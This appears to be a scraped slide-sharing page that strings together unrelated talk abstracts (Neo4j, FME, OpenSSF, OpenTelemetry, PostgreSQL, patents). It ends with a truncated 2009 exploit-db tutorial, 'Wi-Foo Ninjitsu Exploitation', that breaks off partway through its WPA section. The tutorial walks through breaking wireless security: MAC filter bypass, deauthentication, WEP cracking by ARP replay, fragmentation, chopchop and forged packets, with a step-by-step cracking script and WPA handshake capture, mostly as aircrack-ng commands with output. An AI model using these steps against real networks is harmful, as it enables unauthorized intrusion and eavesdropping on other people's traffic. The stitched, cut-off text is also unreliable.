Quantum Communications Q&A with Gemini LLM. These are based on Shannon's Noisy channel Theorem and offers how the classical theory applies to the quantum world.
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfNeo4j
Presented at Gartner Data & Analytics, London Maty 2024. BT Group has used the Neo4j Graph Database to enable impressive digital transformation programs over the last 6 years. By re-imagining their operational support systems to adopt self-serve and data lead principles they have substantially reduced the number of applications and complexity of their operations. The result has been a substantial reduction in risk and costs while improving time to value, innovation, and process automation. Join this session to hear their story, the lessons they learned along the way and how their future innovation plans include the exploration of uses of EKG + Generative AI.
The Rise of Supernetwork Data Intensive ComputingLarry Smarr
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
The DealBook is our annual overview of the Ukrainian tech investment industry. This edition comprehensively covers the full year 2023 and the first deals of 2024.
Coordinate Systems in FME 101 - Webinar SlidesSafe Software
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datams and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Chris Swan
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
Are you interested in dipping your toes in the cloud native observability waters, but as an engineer you are not sure where to get started with tracing problems through your microservices and application landscapes on Kubernetes? Then this is the session for you, where we take you on your first steps in an active open-source project that offers a buffet of languages, challenges, and opportunities for getting started with telemetry data.
The project is called openTelemetry, but before diving into the specifics, we’ll start with de-mystifying key concepts and terms such as observability, telemetry, instrumentation, cardinality, percentile to lay a foundation. After understanding the nuts and bolts of observability and distributed traces, we’ll explore the openTelemetry community; its Special Interest Groups (SIGs), repositories, and how to become not only an end-user, but possibly a contributor.We will wrap up with an overview of the components in this project, such as the Collector, the OpenTelemetry protocol (OTLP), its APIs, and its SDKs.
Attendees will leave with an understanding of key observability concepts, become grounded in distributed tracing terminology, be aware of the components of openTelemetry, and know how to take their first steps to an open-source contribution!
Key Takeaways: Open source, vendor neutral instrumentation is an exciting new reality as the industry standardizes on openTelemetry for observability. OpenTelemetry is on a mission to enable effective observability by making high-quality, portable telemetry ubiquitous. The world of observability and monitoring today has a steep learning curve and in order to achieve ubiquity, the project would benefit from growing our contributor community.
Quality Patents: Patents That Stand the Test of TimeAurora Consulting
Is your patent a vanity piece of paper for your office wall? Or is it a reliable, defendable, assertable, property right? The difference is often quality.
Is your patent simply a transactional cost and a large pile of legal bills for your startup? Or is it a leverageable asset worthy of attracting precious investment dollars, worth its cost in multiples of valuation? The difference is often quality.
Is your patent application only good enough to get through the examination process? Or has it been crafted to stand the tests of time and varied audiences if you later need to assert that document against an infringer, find yourself litigating with it in an Article 3 Court at the hands of a judge and jury, God forbid, end up having to defend its validity at the PTAB, or even needing to use it to block pirated imports at the International Trade Commission? The difference is often quality.
Quality will be our focus for a good chunk of the remainder of this season. What goes into a quality patent, and where possible, how do you get it without breaking the bank?
** Episode Overview **
In this first episode of our quality series, Kristen Hansen and the panel discuss:
⦿ What do we mean when we say patent quality?
⦿ Why is patent quality important?
⦿ How to balance quality and budget
⦿ The importance of searching, continuations, and draftsperson domain expertise
⦿ Very practical tips, tricks, examples, and Kristen’s Musts for drafting quality applications
https://www.aurorapatents.com/patently-strategic-podcast.html
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsMydbops
This presentation, delivered at the Postgres Bangalore (PGBLR) Meetup-2 on June 29th, 2024, dives deep into connection pooling for PostgreSQL databases. Aakash M, a PostgreSQL Tech Lead at Mydbops, explores the challenges of managing numerous connections and explains how connection pooling optimizes performance and resource utilization.
Key Takeaways:
* Understand why connection pooling is essential for high-traffic applications
* Explore various connection poolers available for PostgreSQL, including pgbouncer
* Learn the configuration options and functionalities of pgbouncer
* Discover best practices for monitoring and troubleshooting connection pooling setups
* Gain insights into real-world use cases and considerations for production environments
This presentation is ideal for:
* Database administrators (DBAs)
* Developers working with PostgreSQL
* DevOps engineers
* Anyone interested in optimizing PostgreSQL performance
Contact info@mydbops.com for PostgreSQL Managed, Consulting and Remote DBA Services
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Wi-Foo Ninjitsu Exploitation
1. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
Wi-Foo Ninjitsu Exploitation
|=--------------------------------------------------------------------=|
|=----------------=[ Wi-Foo Ninjitsu Exploitation ]=---------------=|
|=-----------------------=[ 24 February 2009 ]=-----------------------=|
|=---------------------=[ By CWH Underground ]=---------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Wi-Foo Ninjitsu Exploitation
Author : JabAv0C && ZeQ3uL
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-02-24
##########
Contents
##########
[0x00] - Introduction
[0x01] - Security of Wireless network
[0x02] - Breaking the Simple Defenses
[0x02a] - Mac Filtering
[0x02b] - Discover Hidden SSID
[0x02c] - Sniffing informations on the Air
[0x03] - Get closer with cracking tool
[0x03a] - Aircrack-ng suite
[0x03b] - Decrypt packet with airdecap-ng
[0x03c] - Decloak packet with airdecloak-ng
[0x03d] - AirCracking 101
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
[0x04a] - Capturing method
[0x04b] - Cracking method
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
[0x05a] - Monitor Mode
[0x05b] - Fake Authentication
[0x05c] - Arp Replay Attack
[0x05d] - Fragmentation Attack
[0x05e] - Korek ChopChop Attack
[0x05f] - Packetforge
[0x05g] - ARP Request Replay with Interactive Attack
[0x05h] - Cracking WEP Key
[0x06] - Conclusion steps for cracking WEP
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
[0x09] - Exploiting CISCO LEAP
[0x10] - Mass Exploit with Karmetasploit
[0x11] - References
[0x12] - Greetz To
#######################
[0x00] - Introduction
#######################
This paper introduce practical techniques used by hackers to break the wireless security.
We recommend that the reader should have basic knowledge of wireless operation.
This paper contains 13 sections but practical content is in 10 sections, from 0x02 to 0x10.
In section 0x02, we talk about basic attacking to wireless network. Section 0x03 has content about
tools used through this tutorial. In section 0x04, 0x05 and 0x06, we provide information to crack WEP.
Section 0x07, 0x08 and 0x09 are the detail of cracking WPA and WPA2. Section 0x10 is detail about
using metasploit in wireless network through rogue AP.
#######################################
[0x01] - Security of Wireless Network
1 of 12 12/24/10 5:48 PM
2. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
#######################################
Wireless network has serious drawback when comparing with wired network because it use air as media. So, hackers are capab
by using man in the middle method or others.
Therefore, security issue in wireless is highly concerned and until now, the security standard of wireless can divide like
- WEP
- WPA-PSK
- WPA2-PSK
- WPA-802.1x
- WPA2-802.1x
WEP is the original security standard for wireless network but it is cracked easily. WPA and WPA2 are offerred to increase
and solve the vulnerabilities in WEP. WPA and WPA2 still also devide to Pre-shared Key and 802.1x which are used for personal and
respectively. In addition to these standards, there are other mechanisms to enhance wireless security such as, hidden ssid, MAC fi
talk about hacking these security standards and mechanisms in this tutorial and also provide other attacking methods which hacker
wireless network.
#######################################
[0x02] - Breaking the Simple Defenses
#######################################
++++++++++++++++++++++++++++++++
[0x02a] - Bypass Mac Filtering
++++++++++++++++++++++++++++++++
This is a basic security method by storing legitimate client MAC address in the access point. When there is authen
to access point, the access point compares the requesting MAC address with MAC address stored in its memory. If the result
the authentication is success otherwise it is failed. However, this method is easy to bypass, the attacker is only change
We have a case study of bypassing MAC filtering attack. One day, we have a change to do the wireless penetration t
First, we use kismet to discover the access points around the company. This make us know the exact location of each access
by fixing channel for capturing packets. Fixing the target channel can improve efficiency of airodump-ng. We know from air
the access point use open authentication and it does not use any encryption. So, we try to connect to the access point but
our authentication request. We conclude that this network use MAC filtering. From airodump-ng, we see that there are clien
We immediately change our MAC address to be like the associated client and try to connect again. In this time, everything
Moreover, we are able to access internal network of this company and run any tools, such as nmap, nessus, exploit, against
++++++++++++++++++++++++++++++++
[0x02b] - Discover Hidden SSID
++++++++++++++++++++++++++++++++
Some environment, wireless administrator config to hidden ssid. So, the attacker cannot know the ssid of network
and also cannot connect to that network. In airodump, it shows <lenght ?> where ? is the number of ssid lenght.
The only way to know the ssid name is from association request. This packet occurs when there is a legitimate client conne
We are able to force a legitimate client to re-connect to access point by sending de-authentication packet to the client b
The command for doing that is like this:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
After sending du-authentication packet to the client, the client will do re-authentication and re-association.
Airodump-ng can detect this process and know SSID of this network.
++++++++++++++++++++++++++++++++++++++++++++
[0x02c] - Sniffing informations on the Air
++++++++++++++++++++++++++++++++++++++++++++
This topic does not use any advance technique or deep knowledge. Many wireless networks use open authentication wi
encryption mechanism. The attacker needs only sniffing packets from the air and find the credential information of protoco
telnet, ftp etc. These protocol does not have any encryption. So, we can find username and password by only looking the ca
We are able to sniff others data by using airodump-ng.
###########################################
[0x03] - Get closer with cracking tool
###########################################
We Recommend to use Aircrack-NG, Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once
have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new
thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wirel
+++++++++++++++++++++++++++++
[0x03a] - Aircrack-ng suite
+++++++++++++++++++++++++++++
There are four tools in aircrack-ng suite which play an important role in this tutorial.
- airodump-ng: used for capturing packets
Use airodump-ng first every time in order to open monitor mode, which also enable injection capability of our card
- aireplay-ng: used for injection
o de-authentication: used to send deauthentication packet to associated client
o fake authentication: used to perform fake authentication process
o interactive packet replay: used to choose the preferred packet to perform replay attack
o arp replay: used to perform arp replay attack automatically
2 of 12 12/24/10 5:48 PM
3. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
o Korek chopchop: used to generate key stream by using chopchop technique
o fragment: used to generate key stream by using fragment technique
- packetforge-ng: used for create packet
- aircrack-ng: used for recovering key
More detail: http://aircrack-ng.org/doku.php#aircrack-ng_suite1
+++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Decrypt packet with airdecap-ng
+++++++++++++++++++++++++++++++++++++++++++
After we got WEP or WPA key, sometime we want to decrypt captured packet. Aircrack team has already
provide us the tool for doing that. It is called "airdecap-ng". Examples of using airdecap is something like:
#airdecap-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
or
#airdecap-ng -e Workshop workshop-02.cap
The output from these commands is file ending with "-dec.cap".
PS. for WPA, airdecap-ng will return successful result for only file which contains four ways handshake.
+++++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Decloak packet with airdecloak-ng
+++++++++++++++++++++++++++++++++++++++++++++
Cloaking is a technique to disturb cracking WEP key process. This technique is done by injecting packets which are
to the network, these packets are called "chaff". If the attacker capture these packet and do the cracking, The result wil
returned. However, aircrack team developped the tool to deal with this technique, it is called "airdecloak-ng".
#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap
This command return two files:
- workshop-01-filtered.cap: contain the filtered packets from specific bssid
- workshop-01-cloaked.cap: contain the cloaked packets from specific bssid
++++++++++++++++++++++++++++
[0x03d] - AirCracking 101
++++++++++++++++++++++++++++
PTW Attack (-z)
(aircrack-ng -z capture.cap), Only work for WEP 64/128 bits, Require ARP request/replay packet that you mu
Dictionary Attack (WPA/WPA2 passphrases)
(aircrack-ng -w pass.lst *.cap)
Fudge Attack (-f)
Once hit 2 millions IVs, Try fudge factor to "-f 4". Retry, increasing the fudge factor by adding 4 to it
** All the while, keep collecting data. Remember the golden rule, "The More IVs the Better"
#################################################################
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
#################################################################
WEP is just like a dead method to protect network from unauthorized access. There are several means to crack WEP k
The first of all, we should prepare the device which supports monitor mode and can inject packet to the network.
After that we prepare tools for cracking, I choose to use aircrack-ng in BT3 final on vmware.
Ok, let clear about concept of cracking WEP.
The main idea is to collect the encrypted packets as much and fast as we can and then use these packets to crack for the W
So, there are two situations from the above idea.
1. The network is high traffic.
2. The network is low traffic.
What's different between them?
Of course, the first case, we use only airodump to collect packet and crack the key but the second case,
we have to inject packets to capture more packets. We introduce you, first, the capturing and cracking method.
Then we talk about injecting method which is used only with low traffic network.
++++++++++++++++++++++++++++
[0x04a] - Capturing method
++++++++++++++++++++++++++++
First, introduce you the way to collect packets. For 64-bits WEP key, we use about 50,000 IV packets and
about 150,000 IV packets for 128-bits WEP key.
The command for collecting packets is
#airodump-ng –w workshop rausb0
3 of 12 12/24/10 5:48 PM
4. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
------------------------------------------------------------------------------------------
[ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
xx:xx:xx:xx:xx:xx 77 94 10905 11054 0 11 54. WEP WEP OPN Workshop
BSSID STATION PWR Rate Lost Packets Probes
xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy 85 54-54 0 7747
------------------------------------------------------------------------------------------
We will get file “workshop-01.cap†used for cracking the key later.
We can determine the number of packet by the data field, around 90% of packets showing in data field are our required IV p
+++++++++++++++++++++++++++
[0x04b] - Cracking method
+++++++++++++++++++++++++++
After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.
#aircrack-ng –b xx:xx:xx:xx:xx:xx workshop-01.cap
-b xx:xx:xx:xx:xx:xx is the MAC address of target access point
The successful cracking result is following:
---------------------------------------------------------------
Opening workshop-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
#########################################################################
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
#########################################################################
This method is not necessary in high traffic network but it is very important in low traffic network. The idea behind this
we have to inject a packet to force access point to generate new packet back to client. The new packet contains new IV.
If we carefully think about above idea, the source MAC address must be associated, the packet must send from client to acc
and the packet must cause the access point to produce the response or another packet; normally we should the packet which has broa
We can conclude about the requirements of chosen packet for injection as following.
- The MAC address is associated to access point. (we can do this by fake authentication)
- Send from client to access point. (the “To DS†flag is set to 1)
- The destination MAC address is broadcast. (FF:FF:FF:FF:FF:FF)
The well-known packet which covers all requirements is arp request broadcast. In the aircrack-ng suite, there is aireplay-
- The network has ARP request.
- The network has no ARP request.
No matter which case we are faced with, the important we have to realize is that we have to perform injection with associa
Now, we have two choices. First is to change our MAC address to be the associated MAC address or the second is to do fake authenti
++++++++++++++++++++++++
[0x05a] - Monitor Mode
++++++++++++++++++++++++
Using airmon-ng for setting your wifi card to Monitor Mode and prepare for Injection packet.
#airmon-ng start wlan0 11
Setting wlan0 to Monitor mode on channel 11, We must specify the same channel as the target AP channel.
+++++++++++++++++++++++++++++++
[0x05b] - Fake Authentication
+++++++++++++++++++++++++++++++
We can do fake authentication by following command.
#aireplay-ng -1 0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
–a xx:xx:xx:xx:xx:xx is MAC address of access point
–h yy:yy:yy:yy:yy:yy is MAC address of our wireless card
If we get successful result, our MAC address will associate with particular access point.
The successful result look like:
------------------------------------------
00:00:00 Sending Authentication Request
00:00:00 Authentication successful
00:00:00 Sending Association Request
00:00:00 Association successful :-)
------------------------------------------
After succeeding in fake authentication, we have to determine what type of network we are faced with and pick the appropri
4 of 12 12/24/10 5:48 PM
5. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
+++++++++++++++++++++++++++++
[0x05c] - Arp Replay Attack
+++++++++++++++++++++++++++++
We can use arp replay attack by following command.
#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
–b xx:xx:xx:xx:xx:xx is MAC address of access point
–h yy:yy:yy:yy:yy:yy is MAC address of our wireless card
Aireplay-ng will detect arp request and use it to perform replay attack automatically.
The response will look like following when it find out arp request.
------------------------------------------------------------------------------------
21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-0223-210620.cap
You should also start airodump-ng to capture replies.
Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
------------------------------------------------------------------------------------
** In some cases, there is no arp request broadcasted from access point. So, we cannot use normal arp replay attac
We have to generate key stream from captured packet and use the key stream to forge arp request packet and then replay to
in order to generate new IV packet. There are two ways for generate key stream called “chopchop attack†and “fragme
Both methods can perform by aireplay-ng.
++++++++++++++++++++++++++++++++
[0x05d] - Fragmentation Attack
++++++++++++++++++++++++++++++++
Fragment attack is used to generate key stream in a size of 1500 bytes. So, we can use this key stream to create a
which has size up to 1500 bytes. The command for fragment attack is
#aireplay-ng -5 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
The system responds with this:
-------------------------------------------------------------------------------
21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
21:21:07 Waiting for a data packet...
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r
0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8*
0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c
0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z
0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z.
Use this packet ?
-------------------------------------------------------------------------------
We have to answer "y"
-----------------------
Use this packet ? y
-----------------------
And the successful process looks like this:
----------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-212107.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0223-212107.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
----------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++
[0x05e] - Korek ChopChop Attack
+++++++++++++++++++++++++++++++++
There is a guy called KoreK who develop the tricky attacking method called chopchop. It requires only one encrypte
to get key stream and then use the key stream to generate arp request packet and finally perform arp replay attack.
We are able to use chopchop attack with this command.
5 of 12 12/24/10 5:48 PM
6. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
#aireplay-ng -4 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
Aireplay-ng will pick a packet for decrypting. we can should any packet which has BSSID like our target.
The response from the command looks like this:
--------------------------------------------------------------------------------------
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K....
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72 .........r
Use this packet ?
----------------------------------------------------------------------------------------
And we will answer by typing "y" like this
---------------------
Use this packet ? y
---------------------
And then the system do the decrypting
---------------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-211242.cap
Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms
The AP appears to drop packets shorter than 37 bytes.
6 of 12 12/24/10 5:48 PM
7. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor
Completed in 21s (2.48 bytes/s)
---------------------------------------------------------------------------------------
The result from this process is xor file and cap file. xor file contains key stream and cap file contains decrypted packet
+++++++++++++++++++++++
[0x05f] - Packetforge
+++++++++++++++++++++++
Creat encrypted packet form PRGA (XOR) that obtained from chopchop or fragment.
#Packetforge-ng -0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy –k 255.255.255.255 –l 255.255.255.255 –y re
The result is:
----------------------
Wrote packet to: arp
----------------------
From this command, we get arp request packet in file named “arp†.
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x05g] - ARP Request Replay with Interactive Attack
++++++++++++++++++++++++++++++++++++++++++++++++++++++
We use aireplay to inject arp request packet to access point by following command.
#aireplay-ng -2 –r arp rausb0
The response will look like:
-----------------------------------------------------------------------------------
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e f.p.
Use this packet ?
-----------------------------------------------------------------------------------
We have to answer "y"
---------------------
Use this packet ? y
---------------------
aireplay-ng starts injecting the packet.
-------------------------------------------------------
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
-------------------------------------------------------
++++++++++++++++++++++++++++
[0x05h] - Cracking WEP Key
++++++++++++++++++++++++++++
After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.
#aircrack-ng –z capture1.cap (PTW Attack)
The successful cracking result is following:
---------------------------------------------------------------
Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
7 of 12 12/24/10 5:48 PM
8. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
##############################################
[0x06] - Conclusion Scripts for Cracking WEP
##############################################
Note: $AP is Access Point MAC Address
$WIFI is WIFI Card MAC Address
- airmon-ng start wlan0 11 (Must specific channel of Monitor Mode)
- airodump-ng -c 11 -w capture1.cap wlan0
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
- aireplay-ng -4 -b $AP -h $WIFI wlan0
If Not Work!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request
- aireplay-ng -2 -r arp-request wlan0
- aircrack-ng -z capture1.cap
** These Method can use for Crack WEP with Clientless
#########################################
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
#########################################
PSK stands for Pre-Shared Key. These are mechanism improved to solve WEP vulnerabilities.
So, it is able to crack the key by using the same ways as cracking WEP. The only way to recover WPA-PSK or WPA2-PSK is to capture
four ways handshake and crack by using dictionary attack.
The idea for cracking Pre-shared key is to gather four ways handshake packet. We are able to do this by de-authenticate as
This way will force the client to perform re-authentication and we can get four ways handshake from this process. The command for
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
